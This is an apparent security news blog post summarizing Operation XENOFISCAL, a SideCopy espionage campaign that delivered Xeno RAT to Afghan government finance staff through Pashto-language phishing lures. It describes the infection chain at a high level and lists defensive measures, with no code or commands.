top of page
Buscar

Operation XENOFISCAL: The RAT Behind the Revenue Office

  • Foto del escritor: Javier Conejo del Cerro
    Javier Conejo del Cerro
  • hace 1 día
  • 3 min de lectura

A Pakistan-linked threat actor known as SideCopy has been observed conducting a targeted espionage campaign against Afghanistan’s Ministry of Finance and other government financial entities. The operation, dubbed Operation XENOFISCAL, demonstrates a strong understanding of the target environment through the use of Pashto-language lures and infrastructure associated with Afghan organizations. The campaign continues SideCopy’s long-standing focus on South Asian government and defense-related targets, leveraging Xeno RAT to establish persistent access and conduct intelligence collection.


Phase 1: Spear-Phishing Delivery 


The attack begins with a carefully crafted ZIP archive containing a malicious Windows shortcut (LNK) file. The filename is written in Pashto, the primary language used within Afghan government circles, increasing the likelihood that recipients will trust and execute the file.

The targeting extends beyond Afghanistan’s Ministry of Finance to include provincial revenue directorates, government finance employees, and other public-sector personnel responsible for managing financial operations and state revenues.


Phase 2: Remote Payload Retrieval 


When executed, the malicious shortcut abuses the legitimate Windows utility mshta.exe to download a remote HTA file from a compromised Afghan educational website.

The HTA payload executes obfuscated JavaScript directly in memory, reducing forensic visibility and helping the attackers avoid traditional security controls that focus on files stored on disk.


Phase 3: Establishing Persistence 


The malware establishes persistence through Windows Registry modifications while disguising itself as legitimate Microsoft Edge components.

A DLL-based loader is then used to deploy Xeno RAT while simultaneously opening a decoy document to distract the victim and reduce suspicion. This dual-action approach ensures that the victim remains focused on the displayed content while the malware silently installs in the background.


Phase 4: Full Remote Surveillance 


Once active, Xeno RAT connects to a command-and-control server over TCP and provides the operators with extensive remote administration capabilities.

The malware supports:

  • Command execution

  • File upload and download

  • Screenshot capture

  • Keylogging

  • Clipboard monitoring

  • Webcam surveillance

  • Microphone monitoring

  • Scheduled-task persistence

  • SOCKS5 proxy tunneling

  • Antivirus discovery

  • DLL module execution

  • Self-removal capabilities

These features transform an infected workstation into a fully monitored espionage platform.


The Victims


The primary victims are government employees responsible for taxation, revenue collection, budgeting, and financial administration. These users possess access to sensitive economic information, government communications, policy documents, financial records, and administrative systems.

By compromising these individuals, attackers gain visibility into government operations and strategic decision-making processes, potentially supporting broader intelligence-gathering objectives.


Breach Method & Stolen Data


The attack chain relies on spear-phishing, malicious LNK files, mshta.exe abuse, HTA payload execution, obfuscated JavaScript, and Registry-based persistence mechanisms. Once Xeno RAT is deployed, attackers can access virtually any information available on the compromised system.

Potentially exposed data includes:

  • Government financial records

  • Internal communications

  • User credentials

  • Screenshots

  • Clipboard contents

  • Keystrokes

  • Files and documents

  • Network information

  • System configuration details

  • Audio and video surveillance data

The use of a compromised Afghan domain further increases the operation’s credibility while reducing suspicion among targeted users.


Measures to Fend Off the Attack


  • Block or restrict execution of LNK and HTA files where possible.

  • Monitor and alert on suspicious mshta.exe activity.

  • Deploy application allowlisting policies.

  • Disable unnecessary script execution mechanisms.

  • Audit Registry modifications related to persistence.

  • Monitor scheduled task creation.

  • Implement advanced email filtering and phishing protection.

  • Conduct security awareness training focused on spear-phishing.

  • Restrict outbound connections to unknown destinations.

  • Deploy EDR solutions capable of detecting in-memory execution.

  • Monitor for unusual TCP communications and SOCKS5 tunneling activity.

  • Apply least-privilege principles across government environments.


Conclusions


Operation XENOFISCAL illustrates how modern espionage actors continue to combine social engineering, legitimate Windows utilities, compromised local infrastructure, and versatile remote access trojans to achieve long-term intelligence collection objectives. While none of the individual techniques are particularly novel, their careful combination, localization, and targeting demonstrate a mature operation designed to remain unnoticed while maintaining persistent access to sensitive government systems. The campaign reinforces the importance of monitoring trusted system binaries, strengthening phishing defenses, and maintaining visibility into persistence mechanisms across high-value environments.


The Hacker News


 
 
 

Comentarios

bottom of page